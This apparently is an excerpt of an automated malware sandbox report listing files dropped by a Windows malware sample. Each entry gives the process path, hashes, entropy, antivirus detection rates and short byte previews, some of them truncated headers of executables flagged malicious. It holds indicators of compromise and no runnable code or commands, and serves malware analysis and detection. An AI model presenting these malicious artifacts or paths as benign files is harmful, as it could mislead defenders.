                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                                                                                              Entropy (8bit):2.6864909888493336
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:TiZYWvmVEp1s5TYSY5Wp9HTUYEZUTtPiDuMEOwKV7RXaojcpMvvZIf23:2ZD+dT1JLeVlaojcpMvvGf23
                                                                                                                                                                                                                                              MD5:A1635EEEB5F099DC7ED828AF968F639C
                                                                                                                                                                                                                                              SHA1:E36648F819515B3A9BBB826D26F6E9233C05F3B6
                                                                                                                                                                                                                                              SHA-256:5F170BDCA370D81696D35785707572FB5A9B7E9950FE0E50837A1798D865E675
                                                                                                                                                                                                                                              SHA-512:C10C7701F0CD409A9A5BF12A876EC242E65643E4A4D3E96FDBBDF4CD879A33D7CABCBFEB32CB020E21ECED001832B4F6DEE04ECEB82397B5921A95FDEBAD51F8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                              Process:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10496
                                                                                                                                                                                                                                              Entropy (8bit):7.984469394998947
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:aAnkxbr7XNTQwFtSiiFh1eBtpQ9dys4Hcbnvsi3i9FS0swDNC6:aAkxbre0gBFh1xdyCjzWd
                                                                                                                                                                                                                                              MD5:2266F0AECD351E1B4092E82B941211EA
                                                                                                                                                                                                                                              SHA1:1DCED8D943494AA2BE39CA28C876F8F736C76EF1
                                                                                                                                                                                                                                              SHA-256:CBBAD0AB02CD973C9C4E73336E3BCD0849AEB2232A7BDBC38F0B50696B5C28C3
                                                                                                                                                                                                                                              SHA-512:6691CD697BBE7F7A03D9DE33869AAB289D0A1438B4EE194D2047DED957A726B1D3FE93F08E4A0C677018B20E2521AEB021AB1DC4D1A67927604829DDFD9D59AA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:..|.@vC)...q.9....K.{>...d8..'.s.....J.......Pn..k.V.z...@W....L{..uG.'G1.CL..@...<B..6..;.>hM..\..|w.B.v.....u.g...OX.%. .h.r9:|....s..<.6.).g..4GlY...2Bf.5...A..+G....(.T-oE..Z.I23.{..'3...)`...^e7jz/M$s......4....*16..m..frn..DD,......Wa(.2.D..9...........x..........Zk4Da...)?.._h...sA..W.....B2.....cHQ.T....=..U...@.3.}....!...Y.G.C...X{... 4"...&..h.0..'xu..#.c.|g...L0....)...c..M...]....oL{...:En:?.|_X.P.........Q@. .3...o.....).u..a..[...I...+....f....Z.M..%. ].2.uz._......Gw....t.0b........Fa....MT.d..2.Y....&....T............M..X...P......}..+.....Op..Q.E.o6R;.P..>8`2.'".....~C..Z_.........,.2g.. $..l....."x...:.h;..H...........`.$-6....._-e...C?.6T..=..q...L...3.&fG)..W..G..@6.X~.%X....%R...C.h..?R...]......f...bU!.PH..h...".......R...j,d.k......e..\....~.h..n(.....,.G...<...u.1....6t......l.....w;..p..;y..rSC....._.M....6.X....h..t.G7zs..HP,e_d.d.c.n..^.M+ct\0j.r.>;......_n.q.>.x.e.z...w...o...%kkw..Fg..A/.cS..Q./=cj.
                                                                                                                                                                                                                                              Process:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):66816
                                                                                                                                                                                                                                              Entropy (8bit):7.997553643285124
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:1536:Ch3BNYZMDlVC0QNs4iNrkJpzrMpZW2Tqv0VwkF:C9YZMDRQNsEJpz52W6P
                                                                                                                                                                                                                                              MD5:013BC99E3AB2B80A8B0534A68AD914E7
                                                                                                                                                                                                                                              SHA1:7E47990FC7193BD728D743F03DD0520B81E33CF0
                                                                                                                                                                                                                                              SHA-256:0033C1687AD7FA0FE0AC08965C13EEE7EDAF5A581182B71FC663E1EBE3B69945
                                                                                                                                                                                                                                              SHA-512:2F2927A0295A8BF680EC569F314D82AF799CD471CCDA1CDDBFA28B72948388958380A03B68851580044D1A5ED28CFDE58D568A9A125D46BD31C80F8D793238D1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:Y..P...(.<.4.+MhA.rp.Y3!....n./}.Ch..#8Cj;.........A..S`..K.6.k#.8#_^..W..@_."l(...0....x..$sU.,?C...:......*..^O..7V....g..#..m.m..R...(u..I.U. ...^.#.....~pg6..g.oq.TH.......[..?sT.7. ..b.WOVJ......CEv....t.S...W(....M-a....Fy}k...f...>.h.+......R...u....1]r...."n.L.j.Le..............Y.!;.rc/...k..{.D....#R.....q.....G......}.57.*..=.. ....c#X7...o/f....U.3R.yF.U....<....G.T.Y.R..p...L.4....d._.a..,.r.-.E...2../../..&-........W.&].+LK@6H..lOc.......R$p.ZZQ..c.p...1;..b..I.r^.;...~.S....J.,m.....W..wi.jEX6.o57_IcP.mq.....f/.F#..u.=.{7..z..../X5.9..Th..J..(.p....cM.....R.j....s.r.M.4..o^..x.Sd\6i.1....>.z..*...)..mZCk.s.-.....'....k.v..V6?.h....Q.^..j...-...m..+;...<..E.....).r..0....34,.... ..=.R...l....@.O#.6...P._.a.sA|.?g...}..o k.?.Z...5..nD...8E.%.......|..QL...>...G .\..@... .#.3....z....a...Y.[.g..0..a.G......i.G.<..E.#..oZR.-...j..]O.. b.|S..,....Z?..9....C.&].:j...E>..9...0.F]..q.j.(>r..X..n{..v.......^e.}.0$v..7[.%.R.."..L...E...
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1171111125.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):449536
                                                                                                                                                                                                                                              Entropy (8bit):6.408263129357923
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:1O7k28xC7HMDVBjfbL5S6IZ7OGQN/RutyU3ivG/Vt9:+OS6IZ7QN/R8yoaG/P
                                                                                                                                                                                                                                              MD5:BD0CAD52FD3A6537CC7AF21852619340
                                                                                                                                                                                                                                              SHA1:7831109E87D28DA448E5DDC8FA63A3E9750086D3
                                                                                                                                                                                                                                              SHA-256:E58B1261B10B7340A80DB815A8E4A7C9A4FD1C0F29101D1A148104D9E70165FA
                                                                                                                                                                                                                                              SHA-512:08F414ABDDDC0CA9CDC2E9D5FA796273B4E85FDD8EDF49ABC3F61E958DE6E20F3F3E94983301EAAA5D46C806CB0B424498B2F21418FDBF67209CEFDCEDDEA09B
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...f....................@.......................................@..................................y..(................................"..@n...............................m..@............................................text...C{.......|.................. ..`.textbss.................................rdata..............................@..@.data....;.......2...p..............@....rsrc...............................@..@.reloc...".......$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):55040
                                                                                                                                                                                                                                              Entropy (8bit):7.996397661959263
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:1536:xaaMLpm+OPoZJ+D2W/1RbD1Q3a6vCUy4DPHz:M2HPorkRbhaoYDPHz
                                                                                                                                                                                                                                              MD5:127C985E994E51D949C479988AAEBD95
                                                                                                                                                                                                                                              SHA1:1C515DAEE4C8874A48EC0AB167CCBD1B6C3476F3
                                                                                                                                                                                                                                              SHA-256:7E32E80A13D3290119514A952908DA4A512A26F75332C6ECAB18027B5F68D5B6
                                                                                                                                                                                                                                              SHA-512:F473FAD8F182609289F02ED4D09E9D79AC77DED8EDAC5DBB258EEAA62EE79AE86D7FCDB68D3B4912B2EBFA4F34C46CC806E89AE1D15F7B366466E7F76A402E44
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:qU.h.x^..w..j.4.YT.....V\...'I`#..X...L.}...4..\<.NU.......;F.X..W"..k..3?......d..P...........1}..1U....&...i.3.......c<..SaX...@w._#...H...qO\..-.1" |.%L.B|}.r.s......F.....[.6.....:.~..,TE.0.>...X..<z..~.],....i..)-#.O.a.....K.3I.E.b...\].....0....o.q.i....."K3.........k.......>.Q..y....k.!..1..d.<U...n.G.4v?@.o..o....p?.....t.... Q@..>..V....e.Gy.6-..:.......p~...w..!:.z..q.<..|T.w.X.....?F.q.)3Pr......|.\.j.FC4.w....a|zk..9...e.T..*.G$.IF....x.P.!...+*(.W.j...v..........2G...6;a.x.n.....M....d<.?.I...A....0!..[.e.L...Q...'J..u.....$...%6b.$..V.".2..y.....v.R.....Kb.P..U..H.!...@....u.....Q...+Z...p..........,j.%..nf.]k..1'+|~...z0.g[.:e......2?.z...O...*.._.......X....8I..h...v.eZ...9:.iO.S.gl.y{.`bx6.R.-bHWhgF[.oDz....z....6....8l.t.y<.......}D.u..56.T;.,.{.stY.Z.L.1."!h.J.y.^c...q.V.N.WAy<I7......fo-.).m../...$.f.55.....KqQ*c.....hA.......ZM.,....v..@O$j. ..^.t.)..%.B..l........CW..v..[.ZB.....O....8:L.=....-.[E.B...(.P.;".V..+[..e>....
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\34D7.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):80896
                                                                                                                                                                                                                                              Entropy (8bit):6.424014659383267
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
                                                                                                                                                                                                                                              MD5:0C883B1D66AFCE606D9830F48D69D74B
                                                                                                                                                                                                                                              SHA1:FE431FE73A4749722496F19B3B3CA0B629B50131
                                                                                                                                                                                                                                              SHA-256:D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
                                                                                                                                                                                                                                              SHA-512:C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L.....3g.....................d.......u............@..........................p...............................................$.......................................................................................................................text............................... ..`.rdata...3.......4..................@..@.data...(/...@... ..................@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\78476062.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5827584
                                                                                                                                                                                                                                              Entropy (8bit):7.718261688436852
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
                                                                                                                                                                                                                                              MD5:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                                                              SHA1:89C2DFC01AC12EF2704C7669844EC69F1700C1CA
                                                                                                                                                                                                                                              SHA-256:1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                                                                                                                                                                                                                              SHA-512:D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9472
                                                                                                                                                                                                                                              Entropy (8bit):7.981622207506476
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:yqI/498XpWFB+Ql2fZr4uwrUdj1lrPzllMyyoYPVfMd/d7t2qWI:yqIIIY2V5jvrPzllMyytWP
                                                                                                                                                                                                                                              MD5:7E7536E0FA6860F7862748890C9E61FE
                                                                                                                                                                                                                                              SHA1:0A909E6C4CE788CE979D4B003A3C37FE0B60C64A
                                                                                                                                                                                                                                              SHA-256:EE89D2EC2308A0A434B37F9842C28E40BA58A9DF71353AACE6200DD2C727F6AA
                                                                                                                                                                                                                                              SHA-512:73FAF4C7F261A98683A57F56A6717462F59FFCA1CEBAD0CCFBCD5EA78B6D763BF5455373C8E5AB88DDB4ABC06469D984EB4D9368880C56E8A70322D9ECCF6617
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:...Eqn..7...n..*%.v u&PU...K:.P.X..w.j>..?h.r."B...H+<.._..i@.Ft...(..*.sIe.0.al....BM._....$"..o..6....*.65.....&..#&.sQ.e.n...R...H...........x....S...M....".....<..z...j.g..><C.9..1.[.:...1W/...8.....c....h..[...m.....Q....%...bp.....=.=P....$..?./...5.:.j.. .0.....9{.).RLd..uN.."..a<.S..".&..F......o.qI.}S}..J...&.fR.t:.......D...x..._....B)O.UDd....x..7D..a.}Zk)...%..j_7...?.W..g.....l...`.<..#..Z....#....b.p1....PT.............b.....k...G...x.7.[..5......!R...F..mw...5...2)......ZTN.y8..A..(..`_.^Z..`."7.w.......\.=....Bz-......s'.D.....x....e%s.....I,._8..<1Bp.).a.0Q.._I^fB..oa....F..>O*.0X.5(e../k.aa..3.9...[...........r...J&3...V.:.9.._.k".ft...{w.TsV.H.cNE...R...tK.B:...c.4+...}U....2M..!. hm..%C>=....{g...._...{NBa.A~}_...R.....z.y.j..m.9.......Os.+z......Q.[Z.`..Y..i.@.R......j.a...A.aBmA.@zY!...+o...UH.W...O$1.fs.K:.0:*.,....a\n.>....\.P(L..r...@..xSi..e.;.b...|.H.y.W9.>..Sgx.%2.S\.4.`.zG...$..8..)w".......K.vW...`..R
                                                                                                                                                                                                                                              Process:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):63232
                                                                                                                                                                                                                                              Entropy (8bit):7.997234577455722
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:1536:Rb6G5CuemZ88BNRpjVsWAtKhKqjWfD8L4/MKALBEBtiElxxaH4+HeXw:RHeL8BfatK/K8kXANr6jmf
                                                                                                                                                                                                                                              MD5:42680A341BA5D6CF2013FF1F5A3039F1
                                                                                                                                                                                                                                              SHA1:BCF24346BA857DC8DFFA7C7FF369359FB9969966
                                                                                                                                                                                                                                              SHA-256:CD1D10AF836743F1EE93A0CA03D8072D8FC5C44022C846809C5E0482228D6E04
                                                                                                                                                                                                                                              SHA-512:89FE01D9EAEFF01E73D4AD11473DADAFCC7CB2DEB6C8BA98B7C64158C120F45E4134F70DCC17004B506E2A0D783CEDE797DBE5850AAA91C79402BA54C80FCB34
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:3........-;.)V..........X.....*\.Z.^S....,n..q....h. I.....e...;Zz.8'.....4F..Ar..a=X.6O4.3f..b.-.\uu. .y7...........0p\k..,...NXn8....0...4e.I...O.D.Dda...Fq..2._UO....7.w.k.......Nl.....cH..k=.kRd..-07<.x..a\......Y..2J...Y.i..?...s..Vb.h\.../.'.=.;..._....9..M.S*..;.f.......x.;{l.B@,..L.F.?.w.1.b.CV}....7...=..s/..pQ.[....Gm.+P.3]..1....Y[)..e...=t.|..*wOQ.;}GF...:.m. ...k.'.....h.....:.....r...g.rM$...wyg...S.....^.`.3s....^Ye.2..55.4.K.J.L!............j.^R4.o6g........?....{.....x..}.iX........1?r.W.-m..4.v....&n...%...l:_y.....Na.u..T...}..T....!..........V.9D.K.LM.9..#.,f...\.c...^.870.(7.A.V.B..4.s..y..m....E.$............I...R.H.....F'!....,..a........'.s..\$.q...HV...[*..9..R..Sr..zKI7.4...Hy.N.tnC. wY.8I.h..6....;>.E.D...b..y..EWI..c.h.P&="1."......'...R.;.....a_-U.y./....2....4(s...u....QyG.O.8...........`.)u3g9lW2.(.P>2.^'..r.{..g_.....!0i.....-.(bg...T...?J.f.il.C2`.-.N..=TM....[..........1.a..@... .#o;...R.`_....
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\2910625892.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):963
                                                                                                                                                                                                                                              Entropy (8bit):5.014904284428935
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                                                                              MD5:B66CFB6461E507BB577CDE91F270844E
                                                                                                                                                                                                                                              SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                                                                                                                                                                                              SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                                                                                                                                                                                              SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\f5TWdT5EAc.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                              Entropy (8bit):5.019293738763387
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:zMG7Mp1ySr4P6M/r52Od0NDiIp+BYU81fPVdjPbuJxGEOaRh2qh3C7tCEF1K:ACMp/ViVQtp+OJcJxTOchthcFw
                                                                                                                                                                                                                                              MD5:08DAFE3BB2654C06EAD4BB33FB793DF8
                                                                                                                                                                                                                                              SHA1:D1D93023F1085EED136C6D225D998ABF2D5A5BF0
                                                                                                                                                                                                                                              SHA-256:FC16C0BF09002C93723B8AB13595DB5845A50A1B6A133237AC2D148B0BB41700
                                                                                                                                                                                                                                              SHA-512:9CF2BD749A9EE6E093979BC0D3AACFBA03AD6469C98FF3EF35CE5D1635A052E4068AC50431626F6BA8649361802F7FB2FFFFB2B325E2795C54B7014180559C99
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p*}.p!.`p*}.p".`p*}.p6.`p...p(.`p#.ap..`p*}.p .`p*}.p".`pRich#.`p................PE..L...rRCg..................................... ....@..........................`............@.................................l$.......@.......................P.......................................#..@............ ...............................text...:........................... ..`.rdata..4.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                                                                              Process:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9216
                                                                                                                                                                                                                                              Entropy (8bit):5.301254923853182
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:9M3DMm8B/SSgd5DFU8h+h8XZH0XoNubKZH0NFJxGE9ZMz2FFhBC7tCEdfXI:9ix8Bqk8h+6pHMbwHiFJxT7MzmFhiR4
                                                                                                                                                                                                                                              MD5:323CB4364490F83204B51B0F7F3766F4
                                                                                                                                                                                                                                              SHA1:8687A571D083FFEF105D0CE61D46845B4DBA4793
                                                                                                                                                                                                                                              SHA-256:EFADE1639D80B3262D0730A70525DBD703AB51499291B3A1C55B2AA32E74030E
                                                                                                                                                                                                                                              SHA-512:96A5470E361EE1A164BB637E1BC14434050CBF12D3D3BCAE240575D08270DC8038582965CDDDE508C220EC6AA695DFC87D0633F6735EC3D6E637C4CB25B42A3D
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$..EE..EE..EE..b..OE..L=..FE..EE...E..L=..DE..L=..PE..L=..FE..L=..DE..RichEE..................PE..L...h.Og..................................... ....@..........................`............@..................................#.......@.......................P.......................................#..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......."..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):62976
                                                                                                                                                                                                                                              Entropy (8bit):3.8463342467781225
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:dQQ4VsFTmMdMdMdMdMdMdMdMdMoMdMdMdMdMdMdMdMdMnMdMdMdMdMdMdMdMdMoU:WQyQ
                                                                                                                                                                                                                                              MD5:77C5EB90118287F666886FC34210C176
                                                                                                                                                                                                                                              SHA1:D7A59BF4F014304E29DF1868EF82FE782432120A
                                                                                                                                                                                                                                              SHA-256:59A96D66D97E202829EA79A5E0BBF71981C05A13AB700B0120F7D99D33515080
                                                                                                                                                                                                                                              SHA-512:5577D167AD4748AD7917FF3F792A0CAA01BA40638BDF7143C1403D2EFCAD4019F8DA49719AE0AD88FEBDC1EF64207FBA7CA5BB96DC12C334571D30E2E8F22CF9
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,CE.B.E.B.E.B.b.9.M.B.L...F.B.E.C.u.B.L...D.B.L...P.B.L...F.B.L...D.B.RichE.B.................PE..L....~Ig............................O........ ....@..........................0......'.....@.................................,#..x............................ ..\...................................h"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...............................@..@.reloc..6.... ......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\78476062.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5827584
                                                                                                                                                                                                                                              Entropy (8bit):7.718261688436852
                                                                                                                                                                                                                                              Encrypted:false
